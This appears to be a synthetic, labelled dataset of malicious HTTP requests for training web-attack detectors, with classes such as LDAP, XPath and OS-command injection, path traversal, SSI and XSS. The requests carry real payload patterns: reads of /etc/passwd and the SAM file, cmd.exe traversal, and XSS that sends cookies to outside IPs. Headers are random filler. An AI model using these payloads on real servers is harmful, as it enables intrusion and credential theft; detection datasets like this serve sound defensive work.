Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Basic Umtha2E6dWxhZWF1UzE=
Range: 488078-9765
Referer: /otn3nsdd/zba5f/kb5ueohn.mpg
TE: gzip;q=0.1
Trailer: Host
User-Agent: aBswooD2uK http://www.sdssta.uk
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.7 186.126.110.155, 3.0 204.172.153.35
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40565
Start - Id: 38321
class: LdapInjection
GET /culw/aVlrn9R5kRnz/UfqjkwSTKjpasswdydexecC/fteitfwsiiYp/i4Ww/eLn3K2@0QXzyg7xdYE2/his20so2iEiS0Voe/eacutAmuhguiau/C1/rvaSYfAL_Q@.exe?PdD9tUasdit7t=ocnDsmwsahnskaA&tbetweenU1Ftcn3=enpul%29%28%26%28objectClass+%3D++++se*%29 HTTP/1.1
Host: www.biantpc.cz
Connection: eh4sn3e
Accept: text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.169.24.36
Cookie: ud=elciyjnodekobjectdegi;tsFcsnhaosua=oR9Jd
Cookie2: $Version="0"
Date: Mon, 26 Apr 04 16:55:36 CET
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Tue, 30 Jun 09 24:13:22 UTC
If-Unmodified-Since: Sun, 29 Mar 09 12:25:19 CET
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: "VKC4AgD2lbvjicK@et.q"
Max-Forwards: 404
MIME-Version: 8.3
Pragma: micd='le'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic aHk2ZjpsbDJzczlpYg==
Range: -55,-3,-733907
Referer: /sidr5rp/osihlead/daytntd.js
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: t1ra/8.5
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: identity
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38321
Start - Id: 46187
class: PathTransversal
GET /c9lnmststtarenDElei/n-zjzii8icAUnJAdql.jpeg?tstta2rnnnt=t&rgrea=09423220&nerh5ea=nYpa8sni&sebhacnde33e=1&lrcrsg=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&TimYtDdaGhts=749&n7=eaeoeGitd&ylnnttgniorcl=ys6m HTTP/1.0
Host: www.olrb.gov:33
Connection: close
Accept: */*
Accept-Charset: gb2312;q=0.1, utf-8;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=731
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Mon, 19 Jan 04 21:55:09 UTC
ETag: W/"MLizzqbNdRPN0jiUSt"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Fri, 03 Apr 09 16:48:18 CET
If-Match: "NEpaVxwPI-12jrfUL6"
If-None-Match: *
If-Range: Sat, 21 Feb 09 23:06:31 UTC
Max-Forwards: 7323
MIME-Version: 9.2
Pragma: p=famajhe
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: NTLM dTBVYnQzcnRvNkp4YXFoY29lYWllc2RhaWF4cFB4aGVzbWRkcm5zMmhzaWZsaGhk
Range: -746439,91478-,-9017
Referer: http://z9utP.gov/tuecl/tnaaoiyl.pdf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: garw2e (aCbFhAK.; ejy67w7; aRGNOqQ; 5kMOENJT_; 2zDmJv)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46187
Start - Id: 36084
class: PathTransversal
GET /s8B5C.jpg?tuasraRtnsreab=nhe&Vchotj=oiho+hIYad0sfzallgf9oi&2k@K=6591847421&tumthlSit=..........................WINNTsystem.ini&yeowfjer=5824541309 HTTP/1.0
Host: 111.250.241.84
Connection: close
Accept: application/zip;q=0.0, video/*;q=0.9
Accept-Charset: windows-1252, big5;q=0.8, iso-8859-1;q=0.3, euc-jp;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: zt-einlwekl;q=0.0, fh-ifH;q=0.4
Cache-Control: no-transform
Client-ip: 189.28.10.96
Cookie: pmcl=ita36ens0aij:d ;eEpnR7sRe3tteoz=hvbscriptnuuds;lgiwSoHbnnl=sEZbWXMCu44X;WAboteweMgi=crtld
Cookie2: $Version="98"
Date: Sat, 03 Nov 07 09:40:21 UTC
ETag: "7fLBlcqP1.G7Uml"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Thu, 21 Apr 05 13:43:59 UTC
If-Unmodified-Since: Mon, 16 Aug 04 24:00:48 UTC
If-Match: "pr09w2STh04YQNLA"
If-None-Match: *
If-Range: Wed, 30 Sep 09 18:46:51 UTC
Max-Forwards: 604
MIME-Version: 8.7
Pragma: mrr='7edwii'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: http://Ceenmt.de/nsmblunh.php4
TE: gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/3.9 (compatible; d2os; Mac OS X; EerIarddc; hokti; oIYt)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 039x0543
Via: 2.7 101.14.29.209:9
Transfer-Encoding: identity
Upgrade: dnent/3.0, auXt/9.5
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36084
Start - Id: 43278
class: OsCommanding
GET /cAswfma/iL8Z50Wkiy/nurshpbaNsofshd/t_99FfGE1.YaM/eaDnokrlnhdjihi/cnXT/N9qDN/obsI/ss74t9NsLwpyU@OSo/hgeEPaptIaygfHudnr/r-i16@NDen@/raalchbemo.dll?tFJz.NhjGXn=5722&xptic=%25pia5un&bhs=wVYivZG&locationrGIne1=%5Cn+++uftp+-p+++www.nachntmerote.com+++++%2Farllol%2Fteerelstleel%2Fas%2Fnearer%2Fal%2Fngteas HTTP/1.1
Host: 156.253.3.34
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: eot-nto2s0, 8migI9an-zSAch;q=0.6, xk-rnLylua, onicr2-22epna
Cache-Control: no-transform
Client-ip: 86.210.157.25
Cookie: etrC=932359268;xroed=429;ge1o=7eo?likefNshtpassoe g
Cookie2: $Version="414"
Date: Thu, 24 Apr 08 13:45:51 CET
ETag: W/"LVrwdZMaY22OzDr"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Mon, 17 Jul 06 17:07:44 GMT
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: "LlYqESggmMdvozlOuT"
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 8
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM cjMzaml4ZGNnb29xc2VOdGlpb3MyYWE0SGE1TzZpbm93
Range: -8678
Referer: http://www.fshtm.biz/A4sE6eiE/taihEnhe.js
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.7 (compatible; Konqueror/4.2; Linux i586; Shmipecu; aerrio; o81rneNxd)
UA-CPU: PowerPC
UA-Disp: 649,3130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/4.2 www.oeu6fbe.js
Transfer-Encoding: compress
Upgrade: siree/9.1, 17aa/1.9
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43278
Start - Id: 47058
class: XSS
GET /psHahdlwsa6o24/naaeyusCcibetg/@7yhS0radmin-1X.jpeg?tgn8tiIea=iHiQSZc&Chae=7&sa8dtyidmeaha=%3Cimg+++++src+++%3D++%22+++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F217.123.23.44%2Fveis.asmx%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&wu7esada18Ykum=raO38C HTTP/1.0
Host: 16.34.205.38:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-8-i, iso-8859-1, x-mac-chinesetrad;q=0.0, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 66.107.218.203
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="8"
Date: Sun, 23 Nov 08 02:54:28 UTC
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Sat, 17 Nov 07 22:56:28 UTC
If-Unmodified-Since: Wed, 05 Nov 08 13:22:42 CET
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 1
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest qop=7bjofTn
Authorization: Digest uri=http://www.re3ba6.cz/ritpti/aha8yls.txt
Range: 7-
Referer: /obo2e/Eb3hsok/tnftr.msf
TE: deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/3.7 (compatible; MSIE 0.1; SunOS sun4u; Aellns)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 987x1282
Via: 1.2 63.32.107.4
Transfer-Encoding: gzip
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47058
Start - Id: 42821
class: OsCommanding
POST /eufFh1cmnI9Y5Fj5CZ/ilaJq/Nrlgtatws/tKOGA4Zd/gZLyS3lCT8nNmx.Gy/wdsa_se/node9/sxJMK9WPd993N/rVBvgH7Dh8kuW.8OLL@/eNClVJGWM3lKzjkt/m8CszYw.png? HTTP/1.1
Content-Length: 236
Content-Language: 43M
Content-Encoding: identity
Content-Location: http://2xit.uk/lmkut4/7esmr/r2avs/neeIani/vaeOlsa.asp
Content-MD5: b2FoZVJhOG9rb3V0eXNpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Mar 06 05:46:38 GMT
Last-Modified: Sun, 21 Aug 05 23:27:12 GMT
Host: 9.11.228.129
Connection: close
Accept: text/plain;q=0.9, application/zip;q=0.0
Accept-Charset: big5;q=0.9, shift_jis, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: ao-oves;q=0.7, btntpH-he, w-mTniuyg9, Slcrs5y-i;q=0.7, SyUwfen-srk
Cache-Control: min-fresh=829
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="83"
Date: Tue, 05 Sep 06 22:07:28 GMT
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Thu, 30 Sep 04 17:58:41 CET
If-Unmodified-Since: Fri, 14 Mar 08 11:57:36 CET
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: *
If-Range: "gfpaa.SIUenIVxdO"
Max-Forwards: 8
Pragma: 3i='ohtog8n'
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.mandee.de/tnwt.php
Referer: /yamp/taE5pa/hnja5.css
TE: deflate,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: eAtdvhti
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: gzip
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

@SzoqmHb=aAThsBFt&9pxwmni=77644968&Soa5op=496129&sttoeet6Rtsxedn=a3ipn&e5rresnrudi=84&bewrhor6d=24.169.124.174 |    copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd&ql=s8 &d0nr=3na&tcmdCC9Z@=3bL&twreycoEfta=aar5st

End - Id: 42821
Start - Id: 48184
class: XSS
PUT /hoetbtjihuotmnmN/tnasnjelpT/seyeggeereskrSutver/lhsctWadeeteyil2n.mdb? HTTP/1.0
Content-Length: 13
Content-Language: vnmevnl,emihtSe
Content-Encoding: gzip
Content-Location: http://www.iLhRuau.de/rrxd.htm
Content-MD5: aHlINTJzNExvSGlhVHZhaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 05:27:53 GMT
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: 238.179.24.122
Connection: keep-alive
Accept: image/jpeg, image/jpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.2, gzip, compress;q=0.8, identity
Accept-Language: <img   dynsrc  =  "   javascript:[window.open('http://56.21.212.233/nter.dll'+document.cookie);] "  >
Cache-Control: min-fresh=77
Client-ip: 196.219.140.167
Cookie: tsty=h46ri;uebRi7lhdss=91572569;ydt15fl1uesc=424;ngday9stbene=7;AdN7WlJZechoQF=374
Cookie2: $Version="60"
Date: Sun, 30 Mar 08 17:31:40 UTC
ETag: "13Q28YBJBklXk8y"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Sat, 24 Apr 04 16:31:23 GMT
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: "vcZ8ta0u0lgd05my"
If-Range: Sat, 29 Nov 08 19:52:06 UTC
Max-Forwards: 00
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: Digest realm
Range: -1170
Referer: /tfhrcvts/9ufqin.doc
TE: gzip,deflate;q=0.4,deflate;q=0.3
Trailer: Range
User-Agent: mrehmyTcsn (op8cRI0rb; rgZ19J-.AP; fhsSpLHJz; hlYQ8jMju)
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.0 www.6l6hiou.gif, 3.7 170.69.119.111, 7.9 12.24.134.127
Transfer-Encoding: eherne
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 2322173255
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a1soao6tam=75

End - Id: 48184
Start - Id: 39535
class: SSI
GET /y7DTRuu04qOnht/zTmlyipohe6fWI5p/gohOHjZqmOC6YxHfo/Lw-whereNa2h0Hk8.png? HTTP/1.1
Host: 141.105.44.148:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale
Cookie: 1duicrrnadn8=) Rtn oL4isf;d6nieo4enanuLfe=54470469;6haD7=781631;a1gex8rsorjw=egne7itslyS4pwu1tf;a4tE4e8af=5;st=<!--#include     virtual="/etc/passwd"-->
Cookie2: $Version="947"
ETag: W/"KmaQdODS7UU7sMz"
If-Modified-Since: Wed, 29 Mar 06 05:39:30 UTC
If-Unmodified-Since: Wed, 08 Oct 08 05:55:38 UTC
If-None-Match: *
If-Range: Wed, 18 Mar 09 16:04:15 GMT
Max-Forwards: 37
Referer: http://www.zolj7ti.it/TAk2CjN.bin
Trailer: Accept-Language
User-Agent: uiirshTsehmesmmmSff
Transfer-Encoding: deflate
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39535
Start - Id: 45503
class: PathTransversal
GET /3gqV4r@mq/o3a/lfFniOdsu2ebsn9/athamdGl6nY/ebH8OzlElkk9QOVtz-Zk/etEnjcxrBsxwumserdlh/dWH/u4l8KGlnI3.aspx?9h0fdonsipcvto=94054715&dOfkHbAO6WV=a%3A%5Cwindows%5Cboot.ini&s8cb=n%260metykCUc&niwetme=nPxRDHobTzP&eucdArnhyeyc=alwhfopSSustsdi&rapnc=61&dsyN=05573856&hG.B2XxXg=mbf HTTP/1.1
Host: 237.59.144.87
Connection: o9l6e
Accept: */*;q=0.0
Accept-Charset: us-ascii;q=0.5, iso-8859-9;q=0.0, euc-jp;q=0.2, iso-8859-8-i
Accept-Encoding: *
Accept-Language: thap2-u3ntct, 5suifeB-t4efieys;q=0.0, ntej-mtaj
Cache-Control: min-fresh=3345
Client-ip: 136.132.185.114
Cookie: iriyleess3xw1a=sscVnKosYncglmdr7p;hnu6sp4pw=ls  Yietol:;ftpF-xHaxautoexec=es;bnPZ3d@NRwp-=a9inns;rRe5cnhv=2;axehelqe82ryswk=98546266
Cookie2: $Version="629"
Date: Wed, 06 Dec 06 02:13:28 UTC
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: resr4o@b7ostR1pai.cz
If-Modified-Since: Tue, 24 May 05 10:03:54 GMT
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: Thu, 04 Mar 04 09:36:04 GMT
Max-Forwards: 9260
MIME-Version: 4.8
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Digest algorithm=noaen
Authorization: 0sdfe untLe=iocYnPo
Range: 354-,63882-
Referer: http://oghDJ.cz/syTldowy/s7y7ona.conf
TE: trailers,gzip
Trailer: Upgrade
User-Agent: esiTttf
UA-CPU: MIPS
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2096x915
Via: 3.9 216.203.247.210, 7.6 63.100.19.243, 5.6 www.gder.js:36936
Transfer-Encoding: compress
Upgrade: paa/8.6, yprO/1.1
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45503
Start - Id: 37997
class: LdapInjection
GET /itvE/hckvf07j2slskx/optWxp_HM0lsBJtD/tz4-9fLoJJggYZ/dVFPu4L3oMY/QKJ5netcatmsamHQTiez1.jpg?sZ.oJ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Qt7=865702&ef7idem=laanrarhsahnp&joaenhDei=objectAQo&h5xd8edeen=rhw&d6E1i=45604&damr=+usnesock_streamv%3Beu6e%27M%40eul%3FA&rodtsottu=ibD HTTP/1.1
Host: 168.97.123.42:72963
Connection: Shethti
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: loyl-nOoe9, yavtsroe-er8r;q=0.1, k-uaotStr;q=0.0, 6-hyeb;q=0.6
Cache-Control: ixa8a=wCns0lqg
Client-ip: 146.146.211.242
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Wed, 31 Jan 07 07:53:01 GMT
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: Tue, 19 Jul 05 10:49:37 GMT
Max-Forwards: 96
MIME-Version: 4.1
Pragma: onei='etmipext'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: tcxniu pbhHs=eaSs
Range: -90
Referer: http://onrct6bz.it/ctHyna.jpg
TE: gzip;q=0.8
Trailer: TE
User-Agent: pfno (bIEBWnWYKd; djH2WWP; onnu3YR)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 880x8476
Via: 3.7 www.0sEhno.png, miuu/5.1 www.nl8n.gif, HTTP/5.9 167.168.194.134
Transfer-Encoding: compress
Upgrade: 6isty/2.9, aeiotr/0.1
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37997
Start - Id: 44191
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.te52ee5.cz
Connection: keep-alive
Accept: text/xml, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=709
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Sun, 26 Dec 04 04:03:24 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: 100-continue
From: gozi@ydNwdaf.st
If-Modified-Since: Thu, 08 Dec 05 02:40:00 UTC
If-Unmodified-Since: Sun, 26 Dec 04 11:13:04 CET
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: "VOsY1E14NnShhSZ1A"
Max-Forwards: 598
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Basic dG13bHAzYzpkbnVlMA==
Range: 22399-
Referer: /eoero/oselbs/iarylebc/ImeIttdp/tsmea.jpg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.8 (X11; U; Linux i386 8.1; rI-ed; rv:4.7.7) Gecko/98392954
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5614x800
Via: FTP/4.4 www.8Itie.jpeg, 6.7 122.224.94.189:28, HTTP/9.0 208.217.89.106
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 029 235.65.195.127 "i3YfHit9o" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44191
Start - Id: 49650
class: XPathInjection
GET /wT/uugk/sj9K.qNdtj./cVDPD0lcQLda/imgT/79AG@EedM_4N/u1j@fQC3WUodCDaaDY44/eiNwq_mp.sh?ti88sckhr=ncfboot.iniopen%2Bi0a&AJE45@f=aL9fyy4&iunrmr=8++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++19602%3D&8wih0=4&DKgXLLryvUEM=ts95S HTTP/1.0
Host: 33.80.81.71
Connection: close
Accept: application/*;q=0.8, text/xml
Accept-Charset: x-mac-chinesetrad, big5;q=0.7, iso-8859-1, hz-gb-2312;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: o-dth7eMlm;q=0.4, orarc-En, lensEaq-woiew;q=0.7
Cache-Control: only-if-cached
Client-ip: 108.249.101.218
Cookie: einwa1ofmLl=0;caecahonhe5=4mpsz;ueegtk1oFeastt=y1th4lS1;7s=eq0ie
Date: Thu, 15 Feb 07 15:17:25 GMT
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 09 Jun 07 06:29:22 CET
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "IN7EhMwQ.ARu3vM"
If-None-Match: *
If-Range: *
Max-Forwards: 5921
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXlzaHZjZ2VXaHJlcDF1Qmkxc2RoZWFpdHlxczRnczZpcW1GdDZr
Authorization: Digest uri=http://mna4agle.it/ahffsu/so9n/rtiEyi0e/miafb/toahlqn.pdf
Range: 4-,650706-6695,41362-
Referer: http://www.ngiway.net/4n7jf/area/dpn7a8/ehSwrgWi.txt
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: dtc0mhiraa (xu@WqT8UQB; cyfxQ.; ypKFv3HGqe)
UA-CPU: PowerPC
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49650
Start - Id: 38347
class: LdapInjection
GET /m1SOsam1s560eg.php4?yszodcc8Weh=590353&erjdorane2yno=rdW&uP=3827%29%28%26%28objectClass%3Dtse%29%28%7C%28sn+++%3D+saMg%29%28cn%3Dhu++J*%29%29&script-NalDJBgv9=8+t40andgoe&ne=4&x3eo2arp=uaeN&C1GGdf-=qmo%26E&Dnode3anph-bZ3dropm=30 HTTP/1.1
Host: 137.41.120.50:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-8, windows-1254;q=0.7, windows-1253;q=0.2, windows-1257;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.43.137.208
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="2"
Date: Mon, 05 May 08 06:47:57 GMT
ETag: W/"cho582q.Rq4jRDNB"
Expect: 100-continue
From: vuerr@nGeav.fr
If-Modified-Since: Fri, 13 Aug 04 09:31:29 GMT
If-Unmodified-Since: Thu, 10 May 07 13:21:02 GMT
If-Match: *
If-None-Match: "JLvvXg31@D1chy3u_y"
If-Range: Sun, 02 Apr 06 06:34:02 CET
Max-Forwards: 5719
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM ZWVob0VsaHJlQ3JydGVhdW9hbXJpZWlzdHR1OWVzZWFvaW9jZWVlcmNlZmRvbm4=
Range: 0-190754,-136
Referer: http://www.TmerAnun.de/diaohi/trrnC/dOgengas/csdenado.wmn
TE: trailers
Trailer: Accept-Encoding
User-Agent: anhWema/4.9.0.7.3
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: 3.1 144.79.201.13, uim/1.5 www.essxe2ee.gif:270, 8.5 31.0.116.14
Transfer-Encoding: identity
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38347
Start - Id: 49583
class: XPathInjection
GET /samaB18J/Aaccess_log.Gls/riZaR5bESB..jpeg?aeHe79N4oxhrdpr=03+++or++1%3C++e%2FOte%2Fenti%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D77%5D+++++or++0777%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&v_htpassFNFd=290&Elinkpru9=%2F%3C+tw HTTP/1.0
Host: www.mSLo.org
Connection: keep-alive
Accept: image/jpeg;q=0.7, text/*;q=0.1, audio/*;q=0.9
Accept-Charset: windows-1251, iso-10646-ucs-2;q=0.2, koi8, windows-1253, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: a8d=3imeekbe
Client-ip: 217.150.196.230
Cookie: 4PePi7my7e=ssrfe3oyaot<t;lditee=490372;t8enfuhote=at
Cookie2: $Version="84"
Date: Thu, 05 Oct 06 05:52:28 UTC
ETag: ".TlCpyEuLRRD7Ffdh"
Expect: 100-continue
